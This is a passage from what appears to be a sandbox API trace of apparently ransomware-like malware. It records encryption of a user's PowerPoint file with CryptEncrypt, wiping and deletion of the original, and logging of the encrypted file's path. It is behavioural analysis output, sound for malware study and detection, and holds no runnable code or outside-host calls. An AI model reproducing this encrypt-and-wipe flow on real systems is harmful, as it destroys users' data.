dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0033.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.330] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x18731, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x18740) returned 1 [0033.330] CharLowerBuffW (in: lpsz="byte[100161]", cchLength=0xc | out: lpsz="byte[100161]") returned 0xc [0033.333] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.333] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.333] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8c8700*, pdwDataLen=0x6ae220*=0x18731, dwBufLen=0x18740 | out: pbData=0x8c8700*, pdwDataLen=0x6ae220*=0x18740) returned 1 [0033.334] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0033.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.342] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.342] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.342] CryptDestroyKey (hKey=0x7c2200) returned 1 [0033.342] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.342] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.342] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.342] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.343] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.343] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.343] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.343] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.343] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0033.343] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.343] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0033.348] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0033.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.348] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a3078d0, ftCreationTime.dwHighDateTime=0x1d5841f, ftLastAccessTime.dwLowDateTime=0x8dd601b0, ftLastAccessTime.dwHighDateTime=0x1d59271, ftLastWriteTime.dwLowDateTime=0x8dd601b0, ftLastWriteTime.dwHighDateTime=0x1d59271, nFileSizeHigh=0x0, nFileSizeLow=0x18731, dwReserved0=0x0, dwReserved1=0x777648, cFileName="kH1fN.pptx", cAlternateFileName="KH1FN~1.PPT")) returned 0x7c2240 [0033.348] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0033.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.348] CharLowerBuffW (in: lpsz="byte[100145]", cchLength=0xc | out: lpsz="byte[100145]") returned 0xc [0033.348] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0033.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.348] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.349] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.349] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.349] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.350] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.350] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.350] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kh1fn.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0033.350] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.351] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.351] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.351] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.351] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.351] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.351] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.351] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx", lpFilePart=0x0) returned 0x32 [0033.352] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a3078d0, ftCreationTime.dwHighDateTime=0x1d5841f, ftLastAccessTime.dwLowDateTime=0x8dd601b0, ftLastAccessTime.dwHighDateTime=0x1d59271, ftLastWriteTime.dwLowDateTime=0x13c37a60, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x18731, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="kH1fN.pptx", cAlternateFileName="KH1FN~1.PPT")) returned 0x7c2240 [0033.352] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kh1fn.pptx")) returned 1 [0033.354] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a3078d0, ftCreationTime.dwHighDateTime=0x1d5841f, ftLastAccessTime.dwLowDateTime=0x8dd601b0, ftLastAccessTime.dwHighDateTime=0x1d59271, ftLastWriteTime.dwLowDateTime=0x13c37a60, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x18731, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="kH1fN.pptx", cAlternateFileName="KH1FN~1.PPT")) returned 0 [0033.354] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.354] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.354] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.354] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.354] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.354] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.355] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.355] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.355] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.355] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.355] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.355] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.355] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.355] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0033.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.355] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.356] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0xfad, lpOverlapped=0x0) returned 1 [0033.356] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.356] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0xfad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.356] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0033.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.encrypted.pptx\r\n", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0033.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3f) returned 0x7ab380 [0033.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.encrypted.pptx\r\n", cchWideChar=63, lpMultiByteStr=0x7ab380, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kH1fN.encrypted.pptx\r\n", lpUsedDefaultChar=0x0) returned 63 [0033.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.356] WriteFile (in: hFile=0x128, lpBuffer=0x7ab338*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab338*, lpNumberOfBytesWritten=0x6aee3c*=0x3e, lpOverlapped=0x0) returned 1 [0033.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.356] HeapFree (in: hHeap=0x770000, 